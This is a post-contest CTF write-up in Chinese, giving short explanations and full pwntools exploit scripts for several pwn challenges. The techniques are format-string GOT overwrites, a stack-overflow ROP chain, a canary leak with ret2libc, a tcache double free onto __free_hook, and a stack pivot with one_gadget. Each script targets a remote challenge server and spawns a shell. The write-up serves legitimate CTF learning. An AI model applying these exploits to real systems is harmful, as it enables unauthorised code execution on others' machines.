好了,比赛结束了,可以康了。比赛⑧错,都是阳间题。
pwn_签到
使用<代替空格,more获得flag
pwn_babyfmtstr
这里先改写memset的got表为main函数
然后多次利用prinrf泄露地址,往free got写入system函数
最后修复memset的got表继续执行
令motto为/bin/sh\x00
就可以在最后free的时候getshell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73
| exp:
from pwn import * context(log_level="debug", arch="amd64", os="linux")
p=remote('124.156.121.112',28052) elf=ELF('./pwn3') free_plt=elf.plt['free'] free_got=elf.got['free'] mem_got=elf.got['memset'] printf_got=elf.got['printf'] strdup_got=elf.got['strdup'] chk_plt=elf.plt['__stack_chk_fail'] chk_got=elf.got['__stack_chk_fail'] start=0x400aa0 print(hex(free_got))
p.recv()
payload='%3731c%10$hnaaaa'+p64(mem_got) p.sendline(payload) p.recvuntil('please input name:\n') payload='%13$p' payload=payload.ljust(32,'a') p.sendline(payload) p.recvuntil('Hello ') addr=int(p.recv(14),16)-148 libc_base=addr-0x6fd00 print(hex(libc_base)) system=libc_base+0x45390
print(hex(system)) print(hex(system&0xffff)) print(hex((system&0xffff0000)>>16)) print(hex((system&0xffff00000000)>>32))
bss=free_got p.recvuntil('please input name:\n') payload='%'+str((system&0xffff))+'c%10$hn' payload=payload.ljust(16,'a') payload+=p64(bss) p.sendline(payload)
p.recvuntil('please input name:\n') payload='%'+str((system&0xffff0000)>>16)+'c%10$hn' payload=payload.ljust(16,'a') payload+=p64(bss+2) p.sendline(payload)
p.recvuntil('please input name:\n') payload='%'+str((system&0xffff00000000)>>32)+'c%10$hn' payload=payload.ljust(16,'a') payload+=p64(bss+4) p.sendline(payload)
p.recvuntil('please input name:\n')
print(hex(system))
payload='%2454c%10$hnaaaa'+p64(mem_got) p.sendline(payload)
p.recvuntil('size') p.sendline('9') p.recvuntil('please input motto:\n') p.sendline('/bin/sh\x00')
p.interactive()
|
pwn_Magicstring
很简单的一道题目
直接栈溢出即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| from pwn import * context(log_level="debug", arch="amd64", os="linux")
p=remote('124.156.121.112',28040) elf=ELF('./pwn2') system=elf.symbols['system'] gets_plt=elf.plt['gets'] bss=0x601060 pop_rdi=0x0400733 pop_rsi_r15=0x400731 padding=0x2a8 payload='a'*padding+p64(pop_rdi)+p64(bss)+p64(gets_plt)+p64(pop_rdi)+p64(bss)+p64(system) p.recv() p.sendline(payload) time.sleep(0.1) p.sendline('/bin/sh\x00') time.sleep(0.1) p.interactive()
|
pwn_MengxinStack
这个题目pie和canary都开启了
先泄露canary
然后利用main函数返回修改最后一位为libc_start_main+二百三十几的地方,mov rsp rax后call rax,就会重新返回main函数,借机泄露一波libc基址,然后打就完事了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
| from pwn import * context(log_level="debug", arch="amd64", os="linux")
p=remote('124.156.121.112',28015) elf=ELF('./pwn4')
bss=0x601060 pop_rdi=0x0400733 pop_rsi_r15=0x400731 offset=8 p.recvuntil('She said: hello?') p.sendline('a'*(0x40-0x18-1)+'b') p.recvuntil('b\n') canary=u64(p.recv(7).rjust(8,'\x00')) print(hex(canary)) payload='a'*0x28+p64(canary)+p64(0)*3+'\x29' p.send(payload)
payload='a'*0x40+'b'*8 p.recvuntil('She said: hello?') p.send(payload) p.recvuntil('bbbbbbbb') libc_main_addr=u64(p.recv(6).ljust(8,'\x00'))-240 print(hex(libc_main_addr)) libc_base=libc_main_addr-0x20740 print(hex(libc_base)) pop_rdi=0x21102+libc_base bin_sh=libc_base+0x18cd57 system=libc_base+0x45390 payload='a'*0x28+p64(canary)+p64(0)*3+p64(pop_rdi)+p64(bin_sh)+p64(system) p.send(payload)
p.interactive()
|
pwn_babyheap
简单的tcache heap
大小固定,利用double free改写freegot即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62
|
from pwn import * context(log_level="debug", arch="amd64", os="linux")
p=remote('124.156.121.112',28032) elf=ELF('./PWN_babyheap') list_addr=0x602060 free_got=elf.got['free'] def add(content): p.recvuntil('>>') p.sendline('1') p.recvuntil('message_of_your 36D:') p.sendline(content)
def free(idx): p.recvuntil('>>') p.sendline('2') p.recvuntil('index:') p.sendline(str(idx))
def show(idx): p.recvuntil('>>') p.sendline('3') p.recvuntil('index:') p.sendline(str(idx))
add('aa') add('aa') add('aa') add('aa') free(0) free(1) free(2) show(2) heap_addr=u64(p.recvuntil('\x0a',drop=True).ljust(8,'\x00'))-0x290 print(hex(heap_addr)) free(3) free(3) add(p64(list_addr)) add(p64(list_addr)) add(p64(free_got)) show(0) free_addr=u64(p.recv(6).ljust(8,'\x00')) print(hex(free_addr)) libc=free_addr-0x097950 print(hex(libc)) free_hook=libc+0x3ed8e8 system=libc+0x4f440 add('/bin/sh\x00') add('cc') add('dd') free(9) free(9) add(p64(free_hook)) add(p64(free_hook)) add(p64(system)) print(hex(libc)) free(7)
p.interactive()
|
pwn_tang
保护全开
应该是先格式化字符串泄露一下canary,接着返回main函数再次泄露libc
然后栈迁移
还是前面的main返回利用,再加上栈迁移
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80
| from pwn import * context(log_level="debug", arch="amd64", os="linux")
p=remote('124.156.121.112',28028) elf=ELF('./PWN_tang')
p.recvline()
p.sendline('%9$p') canary=int(p.recv(18),16) print(hex(canary)) p.recv() payload='aaaa' p.send(payload)
p.recv() payload='a'*0x38+p64(canary)+p64(0)*3+'\x29' p.send(payload)
p.sendline('%23$p') p.recvline() libc_main=int(p.recv(14),16)-240 libc_base=libc_main-0x20740 pop_rdi=0x21102+libc_base bin_sh=libc_base+0x18cd57 system=libc_base+0x45390 leave_ret=libc_base+0x42351 one_gadget=libc_base+0xf1147 print(hex(libc_base))
payload='a'*0x38+p64(canary)+p64(0)*3+'\x29' p.send(payload) p.recv()
p.send('%27$p') p.recvline() offset=int(p.recv(14),16)-0x9ed print(hex(offset))
payload='a'*0x110+'a'*8+p64(one_gadget) p.send(payload) buf_addr=offset+0x201040 print(hex(buf_addr))
p.recv() payload='a'*0x38+p64(canary)+p64(0)*2+p64(buf_addr+0x110)+p64(leave_ret) p.send(payload) p.interactive()
''' 0x45216 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL
'''
|